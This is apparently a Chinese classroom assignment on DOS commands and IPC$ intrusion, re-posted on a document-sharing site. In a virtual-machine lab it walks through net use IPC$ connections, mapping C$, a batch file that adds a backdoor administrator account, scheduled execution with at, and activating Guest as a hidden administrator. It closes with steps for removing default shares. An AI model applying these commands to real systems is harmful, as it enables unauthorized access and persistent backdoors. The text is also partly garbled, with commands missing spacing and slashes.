第二次作业DOS命令与IPC入侵防范

《第二次作业DOS命令与IPC入侵防范》由会员上传分享，免费在线阅读，更多相关内容在教育资源-天天文库。

1、第二次作业DOS命令与IPC入侵防范一、常用DOS命令（把下列命令运行的结果截图）1、Ping2、Ipconfig3、Dir4、Md5、Echo6、Type7、Netuser8、netlocalgroup1、At2、Netstat3、arp二、DOS命令综合运用之利用IPC漏洞入侵提权（开启windows2000与XP虚拟机）利用XP作为客户机，windows2000作为服务器，在XP中操作入侵wind2000，步骤：1、开启wind2000telnet服务可以用OpenTelnet.exe工具，

2、将OpenTelnet.exe拷贝到C盘根目录下并执行OpenTelnet.exe\192.168.2.2administrator123456190如下图2、给wind2000超级管理员administraror设置密码为123456，如下图3、利用netuse*/del清空所有的IPC连接，如下图4、利用netuse\192.168.2.2ipc$"123456"/user:"administrator"建立一个超级IPC连接，如下图1、利用netusez:\192.168.2.2c

3、$把windows2000C盘变成本地磁盘（XP中）的Z盘，打开XP里我的电脑如下图2、利用echonetuserhack123456/add>>hack.bat和echonetlocalgroupadministratorshack/add>>hack.bat二条指令建立一个名为hack.bat的后门账号，并利用type查看命令是否正确，如下图3、利用copyhack.bat\192.168.2.2c$,把hack.bat拷贝到windows2000的C盘，如下图4、利用nettime\1

4、92.168.2.2查看windows2000系统当前时间，如下图5、假设当前时间为8:45分，则可以利用at\192.168.2.28:46c:hack.bat，来执行hack.bat建立后门账号，如下图：6、利用netuse*/del删除IPC连接，如下图1、等一小段时间后估计windos2000以执行hack.bat，则通过telnet192.168.2.2去登陆，并利用账号hack，密码123456验证，若能登陆说明入侵成功。如下图小策略：为了隐蔽可以利用guest账号，netuser

5、guest/active:yes将Guest用户激活，netuserguest1234将Guest的密码改为1234,netlocalgroupadministratorsguest/add将Guest变为Administrator超级管理员，这样，即使以后管理员更改了他的密码，我们也可以用guest登录了。IPC漏了防范：(1)运行命令提示符(cmd.exe)，在命令提示符下输入如下命令：netshare查看默认共享，如下图(2)在命令提示符下输入如下命令：netshareipc$/delete

6、删除ipc$共享。如下图(3)逐步使用netshare命令，删除c$、d$、e$、f$和admin$共享。如下图(4)接着在命令提示符下输入如下命令：netstopserver/y停止Server服务，该服务提供RPC支持、文件、打印以及命名管道共享，如下图(5)运行注册表编辑器，找到如下键值：HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters修改注册表键值【AutoShareWks】的Dword

7、值为00000000。修改注册表键值【AutoShareServer】的Dword值为00000000。如下图